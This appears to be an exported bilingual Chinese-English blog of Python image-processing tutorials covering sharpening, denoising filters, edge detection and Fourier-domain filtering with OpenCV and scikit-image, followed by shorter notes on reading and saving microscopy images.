    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

    $Unsharpened image = original + amount \times (original - blurred)$

    原理

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
    gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
    img2 = (img - gaussian_img) * 2.
    img3 = img + img2

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()

    png

    unsharp_mask 函数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    #sigma defines the std dev of the gaussian kernel. SLightly different than
    #how we define in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 33 - Image filtering in python - Median filter for denoising images

    • 中值滤波清理椒盐噪声

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    import cv2
    # Needs 8 bit, not float.
    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

    img = img_gaussian_noise

    median_using_cv2 = cv2.medianBlur(img, 3)

    skimage

    1
    2
    3
    4
    5
    6
    7
    8
    9
    from skimage.filters import median
    from skimage.morphology import disk

    """
    Disk creates a circular structuring element,
    similar to a mask with specific radius
    Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
    """
    disk(3)
    array([[0, 0, 0, 1, 0, 0, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [1, 1, 1, 1, 1, 1, 1],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
    1
    median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
    1
    2
    3
    4
    5
    6
    cv2.imshow('Original', img)
    cv2.imshow('cv2median', median_using_cv2)
    cv2.imshow('Using skimage median', median_using_skimage)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

    双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

    cv2.imshow("Original", img)
    cv2.imshow("cv2 bilateral", bilateral_using_cv2)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Skimage

    视频上说很慢…好像确实挺慢

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2
    from skimage.restoration import denoise_bilateral

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
    multichannel=False)
    cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

    NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    import cv2
    import numpy as np
    from skimage import io, img_as_float
    from skimage.restoration import denoise_nl_means, estimate_sigma

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
    sigma_est = np.mean(estimate_sigma(img, multichannel=True)) # 从所有三个通道中选取 Sigma
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\3289355486.py:7: FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma`. It will be removed in version 1.0. Please use `channel_axis` instead.  sigma_est = np.mean(estimate_sigma(img, multichannel=True))
    1
    2
    3
    4
    5
    denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, 
    fast_mode=True,
    patch_size=5,
    patch_distance=3,
    multichannel=False)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\4037562389.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
    1
    2
    3
    4
    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    Skimage

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    from skimage import img_as_ubyte
    import cv2

    img_as_8btype = img_as_ubyte(img)
    denoise_img_as_8byte = img_as_ubyte(denoise_img)

    original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
    final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

    如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)

    1
    2
    3
    4
    5
    import cv2
    from skimage import io, img_as_float
    from skimage.restoration import denoise_tv_chambolle

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
    1
    2
    3
    import matplotlib.pyplot as plt

    plt.hist(img.flat, bins=100, range=(0, 1))
    (array([3.26417e+05, 3.28804e+05, 2.18786e+05, 3.22133e+05, 2.09763e+05,        3.05641e+05, 1.95677e+05, 2.78984e+05, 1.75691e+05, 2.45767e+05,        2.25122e+05, 1.37699e+05, 1.89186e+05, 1.14683e+05, 1.55440e+05,        9.30000e+04, 1.23786e+05, 7.34830e+04, 9.66150e+04, 5.74190e+04,        7.61160e+04, 6.49060e+04, 3.82890e+04, 5.08860e+04, 2.99340e+04,        4.02660e+04, 2.39850e+04, 3.23250e+04, 1.93770e+04, 2.62200e+04,        2.38270e+04, 1.45560e+04, 1.99740e+04, 1.24720e+04, 1.74630e+04,        1.06820e+04, 1.50500e+04, 9.49200e+03, 1.31800e+04, 8.33400e+03,        1.13970e+04, 1.06840e+04, 6.63100e+03, 9.49100e+03, 5.84100e+03,        8.29500e+03, 5.25100e+03, 7.20200e+03, 4.53600e+03, 6.35800e+03,        5.76500e+03, 3.56300e+03, 4.89500e+03, 3.01000e+03, 4.29100e+03,        2.55100e+03, 3.53500e+03, 2.23300e+03, 3.10300e+03, 1.92100e+03,        2.55900e+03, 2.31500e+03, 1.38900e+03, 1.87300e+03, 1.18800e+03,        1.62500e+03, 9.85000e+02, 1.37700e+03, 8.49000e+02, 1.17400e+03,        1.06500e+03, 6.06000e+02, 8.26000e+02, 5.57000e+02, 7.52000e+02,        4.27000e+02, 5.95000e+02, 3.91000e+02, 4.85000e+02, 3.13000e+02,        4.03000e+02, 3.87000e+02, 2.18000e+02, 3.35000e+02, 1.88000e+02,        2.95000e+02, 1.65000e+02, 2.55000e+02, 1.36000e+02, 2.35000e+02,        1.82000e+02, 1.15000e+02, 1.68000e+02, 1.13000e+02, 1.63000e+02,        1.13000e+02, 1.63000e+02, 9.40000e+01, 1.32000e+02, 1.18000e+02]), array([0.  , 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1 ,        0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19, 0.2 , 0.21,        0.22, 0.23, 0.24, 0.25, 0.26, 0.27, 0.28, 0.29, 0.3 , 0.31, 0.32,        0.33, 0.34, 0.35, 0.36, 0.37, 0.38, 0.39, 0.4 , 0.41, 0.42, 0.43,        0.44, 0.45, 0.46, 0.47, 0.48, 0.49, 0.5 , 0.51, 0.52, 0.53, 0.54,        0.55, 0.56, 0.57, 0.58, 0.59, 0.6 , 0.61, 0.62, 0.63, 0.64, 0.65,        0.66, 0.67, 0.68, 0.69, 0.7 , 0.71, 0.72, 0.73, 0.74, 0.75, 0.76,        0.77, 0.78, 0.79, 0.8 , 0.81, 0.82, 0.83, 0.84, 0.85, 0.86, 0.87,        0.88, 0.89, 0.9 , 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98,        0.99, 1.  ]), <BarContainer object of 100 artists>)

    png

    • denoise_tv_chambolle(image, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=False)
      • weight: The greater weight, the more denoising (at the expense of fidelity to input). 权重越大,去噪越多(以牺牲对输入的保真度为代价)。
      • eps: Relative difference of the value of the cost function that determines the stop criterion. 决定停止准则的代价函数值的相对差值。
      • n_iter_max: Max number of iterations used for optimization 用于优化的最大迭代次数
    1
    denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_8228\1044631449.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    1
    2
    3
    4
    cv2.imshow('Original', img)
    cv2.imshow('TV Filtered', denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

    BM3D 算法学习 - 知乎

    png

    1
    pip install bm3d
    Collecting bm3d  Downloading bm3d-3.0.9-py3-none-any.whl (8.4 MB)     ---------------------------------------- 8.4/8.4 MB 2.3 MB/s eta 0:00:00Requirement already satisfied: PyWavelets in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.3.0)Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.23.1)Requirement already satisfied: scipy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.9.0)Installing collected packages: bm3dSuccessfully installed bm3d-3.0.9Note: you may need to restart the kernel to use updated packages.
    1
    2
    3
    4
    5
    6
    7
    from skimage import io, img_as_float
    import bm3d
    import cv2

    noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

    BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
    • bm3d library is not well documented yet, but looking into source code…Bm3d 库还没有很好的文档化,但是查看源代码…
      • sigma_psd - noise standard deviation 噪声标准差
      • stage_arg: Determines whether to perform hard-thresholding or Wiener filtering. 确定是执行硬阈值还是维纳过滤。
      • stage_arg = BM3DStages.HARD_THRESHOLDING or BM3DStages.ALL_STAGES (slow but powerful)
        • BM3DStages。HARD_THRESHOLDING 或 BM3DStagesall_stage(缓慢但强大)

    All stages performs both hard thresholding and Wiener filtering. 所有阶段都执行硬阈值和维纳滤波。

    1
    2
    3
    4
    cv2.imshow("Original", noisy_img)
    cv2.imshow("Denoised", BM3D_denoised_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 38 - Image filtering in python - Edge detection

    Edge Detection filters: 边缘检测滤波器

    • Roberts
      • Apply a horizontal and vertical filter one after the other. 依次使用 Horizontal 和 Vertical 滤镜。
      • Both filters are applied (convoluted) to the image. 两个过滤器都被应用到图像上(卷积)。
      • Computes the sum of the squares of the differences between diagonally adjacent pixels. 计算对角线相邻像素之间的差的平方和。
      • It highlights regions of high spatial which often correspond to edges. 它突出了高空间区域,通常对应于边缘。

    png

    • Sobel
      • Very similar to Roberts excerpt with a $3\times3$ operator. 与 Roberts 非常相似,只是使用了$3\times3$操作符

    png

    • Scharr
      • Typically used to identify gradients along the x-axis (dx=1, dy=0) and y-axis(dx=0, dy=1) independently. 通常用于分别识别沿 x 轴(dx=1, dy=0)和 y 轴(dx=0, dy=1)的梯度。
      • Performance is quite similar to Sobel filter. 其性能与 Sobel 滤波器非常相似。
    • Farid
      • Farid and Simoncelli propose to use a pair of kernels, one for interpolation and another for differentiation (similar to Sobel). Farid 和 Simoncelli 建议使用一对核,一个用于插值,另一个用于微分(类似于 Sobel)。
      • Fixed size kernels: $5\times5$ (interpolation) and $7\times7$ (differentiation) 固定大小的内核:$5\times5$(插值)和$7\times7$(分化)
    • Prewitt
      • The Prewitt operator is similar to Sobel, excerpt for the operator values.
      • Very fast, similar to Sobel.

    png

    1
    2
    3
    import cv2

    img = cv2.imread('images/sandstone.tif', 0)

    png

    1
    2
    3
    4
    5
    6
    from skimage.filters import roberts, sobel, scharr, prewitt

    roberts_img = roberts(img)
    sobel_img = sobel(img)
    scharr_img = scharr(img)
    prewitt_img = prewitt(img)
    1
    2
    3
    4
    5
    6
    cv2.imshow("Roberts", roberts_img)
    cv2.imshow("Sobel", sobel_img)
    cv2.imshow("Scharr", scharr_img)
    cv2.imshow("Prewitt", prewitt_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 39 - Image filtering in python - Edge detection using Canny

    • Multi stage algorithm for edge detection: 多阶段边缘检测算法
      • Step 1: Noise reduction - typically uses Gaussian (but any denoising can be used) 降噪-通常使用高斯(但也可以使用任何降噪)
      • Step 2: Gradient calculation - detect edges, typically along 4 directions, horizontal, vertical, and two diagonals. (e.g. use Sobel) 梯度计算-检测边缘,通常沿 4 个方向,水平,垂直和两个对角线。
        (如使用 Sobel)
      • Step 3: Non-maximum suppression - thin out edges by finding pixels with max value in the edge direction. 非最大抑制-通过在边缘方向上找到最大值像素来减少边缘。
      • Step 4: Double threshold - determines potential edges by double thresholding to obtain strong, weak and irrelevant pixels for edges. 双阈值-通过双阈值确定潜在的边缘,获得边缘的强、弱和无关像素。
      • Step 5: Edge tracking by hysteresis - covert weak edge pixels to strong based on neighboring pixels. 边缘跟踪的迟滞-隐藏弱边缘像素到强基于邻近像素。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    from skimage import io, filters, feature
    import matplotlib.pyplot as plt
    from skimage.color import rgb2gray
    import cv2
    import numpy as np


    img = cv2.imread('images/sandstone.tif', 0)

    #Canny
    canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

    #Autocanny
    sigma = 0.3
    median = np.median(img)

    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - sigma) * median))
    #Lower threshold is sigma % lower than median
    #If the value is below 0 then take 0 as the value

    upper = int(min(255, (1.0 + sigma) * median))
    #Upper threshold is sigma% higher than median
    #If the value is larger than 255 then take 255 a the value

    auto_canny = cv2.Canny(img, lower, upper)


    cv2.imshow("Canny", canny_edge)
    cv2.imshow("Auto Canny", auto_canny)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 40 - What is Fourier transform and how is it relevant for image processing

    Fourier Transform 傅里叶变换

    png

    • Continuous 连续傅里叶变换

      $x=\int_{-\infty}^{\infty} X(t)\cdot e^{-j_{2\pi}ft}dt$

    • Discrete 离散傅里叶变换

      $x = \frac { 1 } { N } \Sigma ^ { N - 1 } _ { n = 0 } x ( { \color { Red } n } ) \cdot e ^ { - \frac { { \color {Blue}j _ {2 \pi } }kn } { N } } $

      • ${\color{Red}n}$: Input signal (pixel value)
      • ${\color{Blue}j_{2\pi}}$: Complex number

    代码

    • 创建一个正弦波
    1
    2
    3
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np
    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
    1
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a404a700>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # 改变频率
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a542f1c0>

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

    #Shift DFT. First check the output without the shift
    #Without shifting the data would be centered around origin at the top left
    #Shifting it moves the origin to the center of the image.
    dft_shift = np.fft.fftshift(dft)

    #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
    #Added 1 as we may see 0 values and log of 0 is indeterminate
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


    #As the spatial frequency increases (bars closer),
    #the peaks in the DFT amplitude spectrum move farther away from the origin

    #Center represents low frequency and the corners high frequency (with DFT shift).
    #To build high pass filter block center corresponding to low frequencies and let
    #high frequencies go through. This is nothing but an edge filter.
    1
    2
    3
    4
    5
    6
    7
    8
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    右边图中,每一个点

    1)它到中点的距离描述的是频率

    2)中点到它的方向,是平面波的方向

    3)那一点的灰度值描述的是它的幅值

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    img = cv2.imread('images/sandstone.tif', 0) # load an image
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    dft_shift = np.fft.fftshift(dft)
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    Tutorial 41 - Image filtering using Fourier transform in python

    1
    2
    3
    4
    5
    import cv2
    from matplotlib import pyplot as plt
    import numpy as np

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    • Output is a 2D complex array. 1st channel real and 2nd imaginary
      • 输出是一个 2D 复数数组。第一通道是实通道,第二通道是虚通道
    • For fft in opencv input image needs to be converted to float32
      • 对于 fft 在 opencv 输入图像需要转换为 float32
    1
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    • Rearranges a Fourier transform X by shifting the zero-frequency component to the center of the array.
      • 通过将零频率分量移到数组的中心来重新排列傅里叶变换 X。
    • Otherwise it starts at the tope left corenr of the image (array)
      • 否则它将从图像(数组)的左核心位置开始
    1
    dft_shift = np.fft.fftshift(dft)
    • Magnitude of the function is 20.log(abs(f))
      • 函数的大小为 20.log(abs(f))
    • For values that are 0 we may end up with indeterminate values for log.
      • 对于 0 的值,我们可能会得到 log 的不确定值。
    • So we can add 1 to the array to avoid seeing a warning.
      • 因此,我们可以向数组中添加 1 以避免看到警告。
    1
    magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))
    • 使用傅里叶变换进行边缘检测

    • Circular HPF mask, center circle is 0, remaining all ones

      • 圆形 HPF 掩码,中心圆为 0,其余均为 1
    • Can be used for edge detection because low frequencies at center are blocked and only high frequencies are allowed.

      • 可以用于边缘检测,因为中心的低频被阻挡,只允许高频。
    • Edges are high frequency components.

      • 边是高频分量。
    • Amplifies noise.

      • 放大噪声。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.ones((rows, cols, 2), np.uint8)
    r = 80
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 0
    • apply mask and inverse DFT: Multiply fourier transformed image (values) with the mask values.
      • 应用掩模和反 DFT:将傅里叶变换后的图像(值)与掩模值相乘。
    1
    fshift = dft_shift * mask
    • Get the magnitude spectrum (only for plotting purposes)
      • 获取幅度谱(仅用于绘图目的)
    1
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\199016683.py:1: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    • Inverse shift to shift origin back to top left.
      • 反向移位将原点移回左上角。
    1
    f_ishift = np.fft.ifftshift(fshift)
    • Inverse DFT to convert back to image domain from the frequency domain.
      • 逆 DFT: 从频域转换回图像域。
    • Will be complex numbers
      • 会是复数
    1
    img_back = cv2.idft(f_ishift)
    • Magnitude spectrum of the image domain
      • 图像域的幅度谱
    1
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    • 绘图
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()

    png

    • Circular LPF mask, center circle is 1, remaining all zeros
      • 圆形 LPF 掩码,中心圆为 1,其余均为零
    • Only allows low frequency components - smooth regions
      • 只允许低频组件-平滑区域
    • Can smooth out noise but blurs edges.
      • 可以消除噪音,但模糊边缘。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r = 100
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 1

    # Band Pass Filter - Concentric circle mask, only the points living in concentric circle are ones
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r_out = 80
    r_in = 10
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
    mask[mask_area] = 1
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    fshift = dft_shift * mask
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    f_ishift = np.fft.ifftshift(fshift)
    img_back = cv2.idft(f_ishift)
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\2728092902.py:2: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))

    png

    ]]>
    @@ -9408,7 +9408,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(22-28)-Python%20Libraries/ - 正文

    数字图像处理的基本步骤

    • 图像获取
    • 图像增强:对图像进行某种操作,使结果在特定应用中比原图像更为合适的过程
    • 图像复原:改善图像外观的一个领域,倾向于以图像退化的数学或概率模型为基础
    • 彩色图像处理
    • 小波:以不同分辨率来表示图像的基础
    • 形态学处理:提取图像中用于表示和描述形状的成分的处理工具
    • 分割:将一幅图像划分为各个组成部分和目标
    • 特征提取
    • 图像模式分类:根据目标特征描述子对目标赋予标记的过程

    Tutorial 22 - Reading images into Python

    Reading Images into Python

    • scikit-image: pip install scikit-image
    • opencv: pip install opencv-python
    • Pillow: PIL - does not import images as numpy array. You can convert using numpy.asarray(img)

    使用 skimage 读取图像

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    img.shape # y, x, c, dtype=uint8
    (1104, 1376, 3)
    • 转成 float 格式
    from skimage import io, img_as_float

    img2 = img_as_float(img)

    不要使用 .astype(np.float)

    import numpy as np

    img3 = img.astype(np.float64)

    转换成 uint8 格式的图像

    from skimage import io, img_as_ubyte

    img_8bit = img_as_ubyte(img2)

    png

    使用 OpenCV 读取图像

    import cv2

    img_cv2 = cv2.imread('images/Osteosarcoma_01.tif') # 彩色图像
    grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0) # 灰度图像
    color_img = cv2.imread('images/Osteosarcoma_01.tif', 1) # 彩色图像
    img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB) # 将图像转为 RGB 格式

    OpenCV 默认使用 BGR 颜色空间, skimage 默认使用 RGB 颜色空间

    png

    Tutorial 23 - Reading proprietary images in python

    • 使用 Python 读取专有图像文件
    import tifffile

    img = tifffile.imread('images/Osteosarcoma_01.tif')
    from skimage import io

    img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
    • tif 还有 3D image 格式 和 Time series 格式

    • 还可以读取 czi(显微镜图像格式) 格式 (Time series, scenes, channels, y, x, z, RGB)

    好专业的图像格式…

    # Let us extract only relevant pixels, all channels in x and y
    img1 = img[0, 0, :, :, :, 0] # 分离出高, 宽, 通道

    # Next, let us extract each channel image.
    img2 = img1[0, :, :] # 第一个通道 Red
    img3 = img1[0, :, :] # 第二个通道 Green
    img4 = img1[2, :, :] # 第三个通道 Blue DAPI

    Tutorial 24 - Saving images from python to your local drive

    skimage

    from skimage import io

    img = io.imread('images/Osteosarcoma_01.tif')
    from skimage import filters

    gaussian_img = filters.gaussian(img, sigma=3) # 此时图像会变成 float 形式
    io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
